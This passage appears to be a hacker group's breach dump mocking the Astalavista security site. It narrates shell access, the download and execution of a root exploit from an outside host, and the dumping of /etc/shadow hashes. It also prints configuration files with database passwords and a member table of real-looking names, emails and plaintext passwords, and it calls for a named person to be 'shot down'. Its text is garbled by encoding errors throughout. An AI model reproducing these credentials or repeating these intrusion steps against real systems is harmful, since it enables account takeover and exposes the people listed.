+¡ª¡ª¡ª¡ª+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
4 rows in set (0.04 sec)
mysql> exit;
Bye
[~] There you go, your ¡°team of security and IT professionals¡± is a joke.
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª+
system:f82BN3+_*
Be1er0ph0r:belerophor4astacom
prozac:asta4cms!
commander:mpbdaagf6m
sykadul:ak29eral
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª+
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
¡and the others, find another area to get paid from, security isn¡¯t for sale and you obviously fail at it.
[~] Lets move to astalavista.net now,
From <Á´½Ó±ê¼Çhttps://www.astalavista.net/>:
>> Everyone knows that the best defense is a good offense.
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.¡±
>> Go ahead, try and hack our server . in a completely legal way!
>> Learn by doing: We offer our members tricky tasks and challenges on an
>> ongoing basis so you can test your knowledge and abilities. You can also
>> demonstrate what you.ve mastered by taking part in regular hacker contests
>> and war games
[~] Lets take a look there, after all¡ they are hack-proof, aren¡¯t they?!
[-] Tricky task: Find home dir of astalavista.net
sh-3.2$ ls -la ~astanet
total 48
drwx¨Cx¨Cx6 astanet astanet 4096 Dec 23 15:55 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
drwxr-xr-x2 root root 4096 Dec 23 16:00 auth
-rw¡ª¡ª-1 astanet astanet 3892 Apr 16 12:14 .bash_history
-rw-r¨Cr¨C1 astanet astanet 33 Dec 17 21:50 .bash_logout
-rw-r¨Cr¨C1 astanet astanet176 Dec 17 21:50 .bash_profile
-rw-r¨Cr¨C1 astanet astanet124 Dec 17 21:50 .bashrc
drwx¨Cx¨Cx3 astanet astanet 4096 Dec 23 12:18 domains
drwxrwx¡ª3 astanet mail 4096 Dec 23 12:18 imap
drwx¡ª¡ª2 astanet astanet 4096 Dec 23 12:18 mail
lrwxrwxrwx1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
-rw-r¡ª¨C1 astanet mail 34 Dec 22 12:41 .shadow
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
sh-3.2$ ls -la
total 200
drwxr-x¡ª 29 astanet apache 4096 Jan6 13:58 .
drwx¨Cx¨Cx8 astanet astanet4096 Dec 23 13:53 ..
drwxr-xr-x3 astanet astanet4096 Dec 272006 _007
drwxr-xr-x7 astanet astanet4096 Jan52006 _0mysql
drwxr-xr-x7 astanet astanet4096 Dec 22 14:16 Á´½Ó±ê¼Çastanet@astalavista.com
drwxrwxrwx2 astanet astanet4096 Jan52006 backend
drwxr-xr-x2 astanet astanet4096 Oct 242006 banner
-rw-r¨Cr¨C1 astanet astanet 25724 Apr42006 banner.jpg
drwxr-xr-x2 astanet astanet4096 Aug 112006 config
drwxr-xr-x3 astanet astanet4096 Jan 12 08:52 cron
drwxr-xr-x 11 astanet astanet4096 Jan52006 dvd
-rw-r¨Cr¨C1 astanet astanet 36 Jan52006 error.php
-rw-r¨Cr¨C1 astanet astanet1406 Jan52006 favicon.ico
drwxrwxrwx2 astanet astanet4096 Dec 152006 feed
drwxr-xr-x3 astanet astanet4096 Dec82006 flashtour
-rw-r¨Cr¨C1 astanet astanet 18 Jan52006 htaccess
-rw-r¨Cr¨C1 astanet astanet 585 Mar 24 14:50 .htaccess
-rw-r¨Cr¨C1 astanet astanet 398 Jan52006 index1.php
-rw-r¨Cr¨C1 astanet astanet1036 Jan52006 _index.html
-rw-r¨Cr¨C1 astanet astanet6880 Dec 23 14:44 index.php
-rw-r¨Cr¨C1 astanet astanet 676 Mar 212006 index_redirect.php
-rw-r¨Cr¨C1 astanet astanet 739 Feb 242006 index.swf
drwxr-xr-x4 astanet astanet4096 Oct 182006 irc
drwxr-xr-x4 astanet astanet4096 Aug 112006 lang
drwxr-xr-x 13 astanet astanet4096 Sep 212006 lib
drwxr-xr-x6 astanet astanet4096 Aug 112006 log
drwxr-xr-x2 astanet astanet4096 Jan 13 14:02 member
drwxrwxrwx5 astanet astanet4096 Jun4 00:03 memberdata
drwxr-xr-x2 astanet astanet4096 Jan52006 new
-rw-r¨Cr¨C1 astanet astanet7219 Feb 242006 pix1.swf
drwxr-xr-x2 astanet astanet4096 Oct 272006 re
-rw-r¨Cr¨C1 astanet astanet 23 Jan52006 robots.txt
drwxr-xr-x3 astanet astanet4096 Aug 112006 rss
drwxr-xr-x 39 astanet astanet4096 Dec 132007 sources
drwxrwxrwx3 astanet astanet4096 Feb2 15:40 temp_com
drwxr-xr-x7 astanet astanet4096 Aug 112006 themes
drwxr-xr-x2 astanet astanet4096 Mar 142008 tmp_src
drwxr-xr-x5 astanet astanet4096 Aug 112006 tpl
drwxr-xr-x3 astanet astanet4096 Sep72006 v2
drwxr-xr-x 16 astanet astanet4096 Jul52006 v2_old
-rw-r¨Cr¨C1 astanet astanet 35 Dec42006 webcash.php
drwxr-xr-x 13 astanet astanet4096 Sep 212006 wiki
sh-3.2$ head -20 index.php
<?PHP
/**
* Mainfile (external) for astalavistaNET v2.0
*
* @copyright Astalavista IT Engineering GmbH
* @author Thomas Kaelin <Á´½Ó±ê¼Çthomas.kaelin@astalavista.ch>
* @version 1.0
*/
if ($_SERVER['PHP_SELF'] == ¡®/webcash.php¡¯) {
$dontStartSession = false;
} else {
$dontStartSession = true;
}
require_once($_SERVER['DOCUMENT_ROOT'].¡¯/config/com.conf.php¡¯);
require_once($_SERVER['DOCUMENT_ROOT'].¡¯/config/ext.conf.php¡¯);
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].¡¯com.class.php¡¯);
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].¡¯ext.class.php¡¯);
sh-3.2$ cd config
sh-3.2$ ls -la
total 32
drwxr-xr-x2 astanet astanet 4096 Aug 112006 .
drwxr-x¡ª 29 astanet apache4096 Jan6 13:58 ..
-rw-r¨Cr¨C1 astanet astanet987 Aug 112006 adm.conf.php
-rw-r¨Cr¨C1 astanet astanet 4937 Dec 23 15:48 com.conf.php
-rw-r¨Cr¨C1 astanet astanet913 Aug 112006 cron.conf.php
-rw-r¨Cr¨C1 astanet astanet 1668 Aug 202008 ext.conf.php
-rw-r¨Cr¨C1 astanet astanet 2724 May 302007 int.conf.php
sh-3.2$ cat com.conf.php
//member-database
$_CONFIG['db_mem_server'] = ¡®localhost¡¯;
$_CONFIG['db_mem_database'] = ¡®astanet_membersystem¡¯;
$_CONFIG['db_mem_user'] = ¡®astanet_db¡¯;
$_CONFIG['db_mem_password'] = ¡®TXwVrC7hbq¡¯;
$_CONFIG['db_mem_debug'] = false; //true or false
//ads-database
$_CONFIG['db_ads_server'] = ¡®localhost¡¯;
$_CONFIG['db_ads_database'] = ¡®astanet_ads¡¯;
$_CONFIG['db_ads_user'] = ¡®astanet_db¡¯;
$_CONFIG['db_ads_password'] = ¡®TXwVrC7hbq¡¯;
$_CONFIG['db_ads_debug'] = false; //true or false
//rainbow-database
$_CONFIG['db_rainbow_server'] = ¡®212.254.194.163¡ä;
$_CONFIG['db_rainbow_database'] = ¡®rainbow¡¯;
$_CONFIG['db_rainbow_user'] = ¡®dinu¡¯;
$_CONFIG['db_rainbow_password'] = ¡®dinudinu¡¯;
$_CONFIG['db_rainbow_debug'] = false; //true or false
//mailing lists database
$_CONFIG['db_mailing_lists_server'] = ¡®localhost¡¯;
$_CONFIG['db_mailing_lists_database'] = ¡®astanet_mailing_lists¡¯;
$_CONFIG['db_mailing_lists_user'] = ¡®astanet_db¡¯;
$_CONFIG['db_mailing_lists_password'] = ¡®TXwVrC7hbq¡¯;
$_CONFIG['db_mailing_lists_debug'] = false; //true or false
//paypal
$_CONFIG['sub_pp_url'] = ¡®Á´½Ó±ê¼Çhttps://www.paypal.com/cgi-bin/webscr¡¯;
$_CONFIG['sub_pp_cmd'] = ¡®_xclick¡¯;
$_CONFIG['sub_pp_business'] = ¡®Á´½Ó±ê¼Çinfo@astalavista.net¡¯;
$_CONFIG['sub_pp_noship'] = ¡®1¡ä;
$_CONFIG['sub_pp_referer'] = ¡®Á´½Ó±ê¼Çhttps://www.paypal.com/¡¯;
sh-3.2$ cd ..
sh-3.2$ cd member
sh-3.2$ ls -la
total 20
drwxr-xr-x2 astanet astanet 4096 Jan 13 14:02 .
drwxr-x¡ª 29 astanet apache4096 Jan6 13:58 ..
-rw-r¨Cr¨C1 astanet astanet 19 Jan 13 14:02 .htaccess
-rwxr-xr-x1 astanet astanet 6709 Jan 13 14:06 index.php
sh-3.2$ cat .htaccess
SecFilterEngine off
sh-3.2$ cd ..
sh-3.2$ cd cron
sh-3.2$ ls -la
total 168
drwxr-xr-x3 astanet astanet4096 Jan 12 08:52 .
drwxr-x¡ª 29 astanet apache 4096 Jan6 13:58 ..
-rw-r¨Cr¨C1 astanet astanet1272 Jan 12 08:24 0_corefile.php
-rw-r¨Cr¨C1 astanet astanet2356 Aug 112006 0_functions.php
-rw-r¨Cr¨C1 astanet astanet3616 Dec 23 15:44 1_daily.php
-rw-r¨Cr¨C1 astanet astanet 527 Aug 112006 1_fivemin.php
-rw-r¨Cr¨C1 astanet astanet5006 Dec 23 15:39 1_hourly.php
-rw-r¨Cr¨C1 astanet astanet 432 Aug 112006 1_weekly.php
-rw-r¨Cr¨C1 astanet astanet2277 Aug 112006 2_advertising.php
-rw-r¨Cr¨C1 astanet astanet4882 Dec 23 15:40 2_archives.php
-rw-r¨Cr¨C1 astanet astanet3784 Aug 162006 2_awstats.sh
-rw-r¨Cr¨C1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
-rw-r¨Cr¨C1 astanet astanet 14979 Jan 12 09:10 2_expire.php
-rw-r¨Cr¨C1 astanet astanet7657 Aug 152006 2_exploitree_updater.php
-rw-r¨Cr¨C1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
-rw-r¨Cr¨C1 astanet astanet9853 Aug 112006 2_keywords_old.php
-rw-r¨Cr¨C1 astanet astanet 15664 Sep 222006 2_keywords.php
-rw-r¨Cr¨C1 astanet astanet1233 Aug 112006 2_proxy_checker.php
-rw-r¨Cr¨C1 astanet astanet7558 Aug 112006 2_proxy_collector.php
-rw-r¨Cr¨C1 astanet astanet 796 Aug 112006 99_create_emails.php
drwxr-xr-x2 astanet astanet4096 Aug 112006 99_lang_email
-rw-r¨Cr¨C1 astanet astanet9622 Jan6 16:04 login_reminder.php
-rw-r¨Cr¨C1 astanet astanet9620 Jan6 16:05 login_reminder_test.php
sh-3.2$ cd ..
sh-3.2$ cd _007
sh-3.2$ ls -la
total 24
drwxr-xr-x3 astanet astanet 4096 Dec 272006 .
drwxr-x¡ª 29 astanet apache4096 Jan6 13:58 ..
-rw-r¨Cr¨C1 astanet astanet 96 Dec 23 15:17 .htaccess
-rw-r¨Cr¨C1 astanet astanet 3263 Jan 152007 index.php
-rw-r¨Cr¨C1 astanet astanet 20 Dec 272006 info.php
drwxr-xr-x5 astanet astanet 4096 Aug 112006 sitemap
sh-3.2$ cat.htaccess
authType Basic
authName Admin
authUserFile /home/astanet/auth/.htadm_pwd
require valid-user
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
admin2net:CR0bl65MwhfT
sh-3.2$ mysql -u astanet_db -p
Enter password:
Welcome to the MySQL monitor.Commands end with ; or \g.
Your MySQL connection id is 275153
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
Type ¡®help;¡¯ or ¡®\h¡¯ for help. Type ¡®\c¡¯ to clear the buffer.
mysql> show databases;
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
| Database |
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
| information_schema |
| astanet_ads |
| astanet_mailing_lists |
| astanet_mediawiki |
| astanet_membersystem|
| test |
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
6 rows in set (0.00 sec)
mysql> use astanet_membersystem
Database changed
mysql> show tables;
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
| Tables_in_astanet_membersystem |
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
| blacklist_categories |
| blacklist_content |
| blacklist_levels |
| blacklist_mcset |
| dir_categories |
| dir_comments |
| dir_links |
| dir_temp |
| dir_votes |
| documents |
| documents_categories |
| email_content |
| email_settings |
| exploits |
| exploits_categories |
| exploittree_categories |
| exploittree_exploits |
| home_values |
| iso_countries |
| links_categories |
| links_records |
| links_unauth |
| links_votes |
| log |
| news_categories |
| news_comments |
| news_emoticons |
| news_latest |
| news_messages |
| news_statistics |
| news_votes |
| prices_content |
| prices_offers |
| rss_settings |
| sessions |
| stats_signups |
| u2u2 |
| u2u_contact |
| u2u_settings |
| user_keywords_selected_categories |
| users |
| users_ipn_test |
| users_keyword_values |
| users_profile |
| users_temp |
| users_upgrade |
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
46 rows in set (0.00 sec)
mysql> describe users;
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+¡ª¡ª+¡ª¨C+¡ª¡ª¡ª¡ª¡ª¡ª¡ª+¡ª¡ª¡ª¡ª¡ª-+
| Field | Type | Null | Key | Default | Extra |
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+¡ª¡ª+¡ª¨C+¡ª¡ª¡ª¡ª¡ª¡ª¡ª+¡ª¡ª¡ª¡ª¡ª-+
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
| user | varchar(50) | NO | | | |
| nickname | varchar(30) | NO | MUL | anonymous | |
| password | varchar(30) | NO | | | |
| userlevel | tinyint(3) | YES| MUL | NULL | |
| exp | int(8) unsigned | NO | | 0 | |
| email | varchar(50) | NO | | | |
| ip | varchar(15) | NO | | 0 | |
| proxy | set(¡¯0¡ä,¡¯1¡ä) | NO | | 0 | |
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
| anz_in | tinyint(1) | NO | | -1 | |
| status | tinyint(1) unsigned | NO | | 0 | |
| checked | set(¡¯0¡ä,¡¯1¡ä,¡¯2¡ä) | NO | | 0 | |
| freemember | set(¡¯0¡ä,¡¯1¡ä) | NO | | 0 | |
| ordertype | set(¡¯transfer¡¯,'wp¡¯,'pp¡¯,'mc¡¯,'CnB¡¯) | YES| | NULL | |
| lang | tinytext | NO | | | |
| adid | smallint(6) | NO | | 0 | |
| pp_txn_id | varchar(255) | YES| | NULL | |
| cnb_transaction_id | varchar(255) | YES| | NULL | |
| cnb_order_id | varchar(255) | YES| | NULL | |
| cnb_user_id | int(11) | YES| | 0 | |
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+¡ª¡ª+¡ª¨C+¡ª¡ª¡ª¡ª¡ª¡ª¡ª+¡ª¡ª¡ª¡ª¡ª-+
22 rows in set (0.01 sec)
mysql> select count(*) as skids from users;
+¡ª¡ª-+
| skids |
+¡ª¡ª-+
| 25199 |
+¡ª¡ª-+
1 row in set (0.00 sec)
mysql> select user,nickname,password,email from users where userlevel = 1;
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+¡ª¡ª¡ª¡ª¡ª¡ª¡ª-+¡ª¡ª¡ª¡ª¡ª¡ª+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
| user | nickname | password | email |
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+¡ª¡ª¡ª¡ª¡ª¡ª¡ª-+¡ª¡ª¡ª¡ª¡ª¡ª+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
| pascal | prozac | astaman3 | Á´½Ó±ê¼Çinfo@astalavista.net |
| Ivan Schmid | rOOtless1 | astalavista4asta | Á´½Ó±ê¼Çivan.schmid@comvation.com |
| qreymer | Palermo | qblsw85iam | Á´½Ó±ê¼Çeche@home.se |
| Christian Wehrli | g0atherd | hitt?74 | Á´½Ó±ê¼Çg0atherd@gmx.net |
| Andrew Blake | Minky | liq73uid | Á´½Ó±ê¼Ça.blake@har.mrc.ac.uk |
| Martin Wyss | dinu | kj63;cXy | Á´½Ó±ê¼Çmartin.wyss@astalavista.net |
| Leandro Nery | Timan_no_Sanco | nery2002 | Á´½Ó±ê¼Çleandronery@hotmail.com |
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | Á´½Ó±ê¼Çshavingryansprivates1@hotmail.com |
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | Á´½Ó±ê¼Çspoofedexistence@hotmail.com |
| David M Lee | Daremo | icG12m03 | Á´½Ó±ê¼Çdaremo@hackerheaven.com |
| David Corn | akriel | ve3uB$cUku | Á´½Ó±ê¼Çakriel@fallenroot.net |
| Thomas Kalin | Gwanun | QwErTy123 | Á´½Ó±ê¼Çthomas.kaelin@astalavista.net |
| Marcus unknown | Cra58cker | hhCr4ck06 | Á´½Ó±ê¼Çunknownmarcus@hotmail.com |
| David Ellis | dellis203 | philip | Á´½Ó±ê¼Çdellis@nightwatchnss.com |
| Lars Christian Solberg | xeor | tF3s4|Nea | Á´½Ó±ê¼Çxeor@hush.com |
| Paulo Santos | Be1er0ph0r1 | amor01 | Á´½Ó±ê¼Çpmsantos@gmx.ch |
| Thomas D?ppen | daha | asta4tom | Á´½Ó±ê¼Çthomas.daeppen@astalavista.ch |
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | Á´½Ó±ê¼Çtoraj.a.m@gmail.com |
| Fabius Bernet | traviser | wellenreiter100| Á´½Ó±ê¼Çfabius.bernet@astalavista.ch |
| Zachary McElroy | duder1 | dirty245dix | Á´½Ó±ê¼Çmcelroyzj@yahoo.com |
| Leron Cohen | cohen2 | leron4free | Á´½Ó±ê¼Çleron@quiredmedia.com |
| Beatriz Pontes | anonymous1656 | pitas | Á´½Ó±ê¼Çjoao.pedro.pontes@gmail.com |
| Glafkos Charalambous | anonymous2086 | si99490178$# | Á´½Ó±ê¼Çnowayout@webhostline.com |
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | Á´½Ó±ê¼Çivan.schmid@astalavista.ch |
| Peter Fisher | cyph3r1 | testZer025435 | Á´½Ó±ê¼Çcyph3r@astalavista.com |
| sykadul | sykadul | ak29eral | Á´½Ó±ê¼Çsykadul@gmail.com |
| Ronny Janzi | commander1 | mpbdaagf6m | Á´½Ó±ê¼Çronny.janzi@astalavista.ch |
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+¡ª¡ª¡ª¡ª¡ª¡ª¡ª-+¡ª¡ª¡ª¡ª¡ª¡ª+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
27 rows in set (0.00 sec)
mysql> exit;
Bye
[~] plaintext passwords? yes,
Those so called ¡°security professionals¡± who charge you $6.66 / month to
register at their hack-proof portal, save your passwords in plaintext¡
brilliant!
[~] This been fun but we want more.
sh-3.2$ uname -a
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
sh-3.2$ wget Á´½Ó±ê¼Çhttp://anti.sec.labs/g0troot
¨C13:33:37¨CÁ´½Ó±ê¼Çhttp://anti.sec.labs/g0troot
Resolving anti.sec.labs¡ 13.33.33.37
Connecting to anti.sec.labs|13.33.33.37|:80¡ connected.
HTTP request sent, awaiting response¡ 200 OK
Length: 18200 (18K)
Saving to: `g0troot¡¯
100%[=========================================================================================================================================>] 18,200 58.6K/s in
0.3s
18:55:14 (58.6 KB/s) - `g0troot¡¯ saved
sh-3.2$ ./g0troot -i x86_64
[+] g0troot - anti.sec.labs
[+] Target: 2.6.18-128.1.10.el5
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
[+] r00tr00t
[~] Executing shell¡
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# cat /etc/shadow
root:$1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
admin:$1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
jon:$1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
com:$1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
astanet:$1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
sh-3.2# cat /etc/motd
#####################################################
#____ ____ ___ ____ _ ____ __ _ ____ ___ ____#
# |__| [__ ||__| | |__| || | [__ ||__| #
# || ___]||| |___ ||\/| ___]||| #
# #
#####################################################
# #
# Admin Contact - Á´½Ó±ê¼Çsupport@secureservertech.com #
# #
# Available ShortCuts #
# #
# nst -list active connections #
# ddos - shows how many times each ip is connected#
# ltr -restart the webserver #
# phpc - edit the php config file #
# htc -edit the webserver configuration file #
# up - uptime #
# etd - edit the motd of the day file #
# htr - start and restart apache if needed #
# syng - shows active SYN_RECV connections #
# synd - syn flood blocker - ¡°synd -h¡± for usage #
#####################################################
# NOTES: #
# Last Upgrade - 12-08-2008 by JF #
# My.cnf/Mysql Optimization - 1-28-09 #
# #
# #
# #
#####################################################
sh-3.2# lastlog | grep -v Never
Username Port From Latest
root pts/1 adsl-194-162-fix Thu Jun4 07:19:14 +0000 2009
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
com pts/0 cust.static.212- Tue Jun2 07:46:30 +0000 2009
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
sh-3.2# ls -la
total 453376
drwxr-x¡ª 15 root root 4096 Jun4 08:40 .
drwxr-xr-x 25 root root 4096 Jun3 02:43 ..
-rw-r¨Cr¨C1 root root 2394400 Oct 192007 10mbtest.zip
-rw¡ª¡ª-1 root root 1006 Sep 112007 anaconda-ks.cfg
-rw¡ª¡ª-1 root root 16836 Jun4 07:21 .bash_history
-rw-r¨Cr¨C1 root root 24 Jan62007 .bash_logout
-rw-r¨Cr¨C1 root root 191 Jan62007 .bash_profile
-rw-r¨Cr¨C1 root root 176 Jan62007 .bashrc
-rwx¡ª¡ª1 root root 1899 Oct 282007 bk.sh
-rw-r¨Cr¨C1 root root 1327 Nov 292007 cert
-rw-r¨Cr¨C1 root root139860821 May 142008 contrexxbackup_20080514.sql
drwxr-xr-x4 root root 4096 May 202008 .cpan
-rw-r¨Cr¨C1 root root 100 Jan62007 .cshrc
-rw-r¨Cr¨C1 root root 323079 Mar 31 13:48 defaultp_ports.sql
drwx¡ª¡ª2 root root 4096 Oct 282007 .elinks
drwxr-xr-x 13 root root 4096 Mar 212008 gdb-6.7.1
-rw-r¨Cr¨C1 root root 15080950 Oct 292007 gdb-6.7.1.tar.bz2
-rw¡ª¡ª-1 root root 0 Apr 16 13:19 .history
-rw-r¨Cr¨C1 root root 16095 Sep 112007 install.log
-rw-r¨Cr¨C1 root root 2566 Sep 112007 install.log.syslog
-rw-r¨Cr¨C1 root root 1003 Jul 222007 install.sh
-rw¡ª¡ª-1 root root 35 Jun2 14:23 .lesshst
drwxr-xr-x2 root root 4096 Dec 292007 .lftp
drwxr-xr-x 10 root root 4096 Sep 142007 linux-2.6.19.2-grsec
-rw-r¨Cr¨C1 root root 94979336 Feb 162007 linux-2.6.19.2-grsec.tar.gz
-rw-r¨Cr¨C1 root root 4737058 Sep 222007 linux-2.6.22.tar.bz2
-rwx¡ª¡ª1 root root 760 Sep 182008 lp
drwxr-xr-x 12 root root 4096 Nov 302007 lsws-3.3.1
-rw-r¨Cr¨C1 root root 2480045 Nov 302007 lsws-3.3.1-ent-x86_64-linux.tar.gz
-rw-r¨Cr¨C1 root root 6388501 Nov 292007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
drwxr-xr-x 12 root root 4096 Mar 212008 lsws-3.3.9
-rw-r¨Cr¨C1 root root 6437577 Mar 212008 lsws-3.3.9-ent-x86_64-linux.tar.gz
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
-rw-r¨Cr¨C1 root root 6496050 May8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
-rw-r¨Cr¨C1 root root 25316 Feb 152006 mybk.sh
-rw¡ª¡ª-1 root root 41 Oct 192007 .my.cnf
-rw¡ª¡ª-1 root root 2902 Jun4 08:40 .mysql_history
-rwx¡ª¡ª1 root root 38873 Apr 162008 mysqlreport
-rw¡ª¡ª-1 root root 41 May 202008 .mytop
drwxr-xr-x3 10001000 4096 May 202008 mytop-1.6
-rw-r¨Cr¨C1 root root 19720 Feb 172007 mytop-1.6.tar.gz
drwxr-xr-x2 root root 4096 Oct 282007 .ncftp
-rw¡ª¡ª-1 root root 1462 Sep 212007 opt.php
-rw-r¨Cr¨C1 root root 3371 Sep 222007 p
-rw-r¨Cr¨C1 root root 7608429 Aug 302007 php-5.2.4.tar.bz2
-rw¡ª¡ª-1 root root 1024 Feb3 21:32 .rnd
-rw-r¨Cr¨C1 root root 716 Nov 282007 server.csr
-rw-r¨Cr¨C1 root root 887 Nov 282007 server.key
drwx¡ª¡ª2 root root 4096 Oct 102008 .ssh
-rw-r¨Cr¨C1 root root 44227 Oct 282007 tar-inc-backup.dat
-rw-r¨Cr¨C1 root root 129 Jan62007 .tcshrc
-rw-r¨Cr¨C1 root root104874307 Oct 172007 test100.zip
-rw-r¨Cr¨C1 root root 67085540 Oct 192007 test100.zip.1
drwxr-xr-x2 root root 4096 Apr 29 11:15 tmp
-rw-r¨Cr¨C1 root root 42596 May 212007 tuning-primer.sh
drwxrwxrwx 19 1000 users 4096 Mar 212008 valgrind-3.3.0
-rw-r¨Cr¨C1 root root 4519551 Dec 112007 valgrind-3.3.0.tar.bz2
-rw¡ª¡ª-1 root root 12997 May 162008 .viminfo
sh-3.2# cat .bash_history
wget cp4sst.com/sstlinux.tar.gz
tar zxvf sstlinux.tar.gz
cd linux-2.6.27.10
sh install.sh
make bzImage ; make modules ; make modules_install ; make install
make clean
service mysqld restart
cd /usr/sbin/
chmod 4777 traceroute
chmod 4777 ping
traceroute -I Á´½Ó±ê¼Çwww.astalavista.ch
vi /etc/csf/csf.conf
traceroute google.ch
service csf restart
tracert google.ch
service csf restart
traceroute Á´½Ó±ê¼Çwww.google.ch
tracert Á´½Ó±ê¼Çwww.google.ch
traceroute Á´½Ó±ê¼Çwww.google.ch
locate traceroute
chown 4755 /bin/traceroute
chown 4777 /bin/traceroute
locate ping
chown 4755 /bin/ping
chown 4777 /bin/ping
cd /bin/
ls -ali | grep ping
chown root ping
chmod 4755 ping
ls -ali | grep traceroute
chown root traceroute
chmod 4755 traceroute
ls -ali | grep traceroute
traceroute -I Á´½Ó±ê¼Çwww.google.ch
traceroute Á´½Ó±ê¼Çwww.google.ch
whois pmsantos.ch
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
top
ping ssth.ch
ping asdlkfaljgasd???ljg???lasj.ch
ping asdlkfaljgasdlasj.ch
ping Á´½Ó±ê¼Çwww.ssth.ch
ping ssth.ch
nslookup Á´½Ó±ê¼Çwww.google.ch
nslookup Á´½Ó±ê¼Çwww.ssth.ch
man nslookup
ping Á´½Ó±ê¼Çwww.google.ch
nslookup Á´½Ó±ê¼Çwww.google.ch
nslookup Á´½Ó±ê¼Çwww.google.ch
nslookup salfjasdlf.ch
openssl passwd -1 sadf
openssl passwd -1 5cZNHstdTy
mysql
mysql
locate proftp
vi /etc/proftpd.passwd
service proftpd restart
locate proftpd.conf
vi /etc/proftpd.conf
vi /etc/proftpd.passwd
service proftpd restart
/bin/sh /home/com/backup_system/backup.sh
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
mysqldump -h localhost -u contrexxuser2 ¨Cpassword=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
mysqldump -h localhost -u contrexxuser2 ¨Cpassword=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
ls -ali
mysqldump -h localhost -u com_user1 ¨Cpassword=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
mysqldump -h localhost -u com_user1 ¨Cpassword=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
crontab -l
crontab -l
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
/home/com/public_html/modifications/cronjobs/exploits.sh
wget Á´½Ó±ê¼Çhttp://www.litespeedtech.com/pac ... x86_64-linux.tar.gz
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
cd lsws-4.0.3
sh install.sh
uptime
hdparm -tt /dev/sda
iostat
yum install iostat
iostat
whereis iostat
yjm clean all
yum clean all ; yum -y update
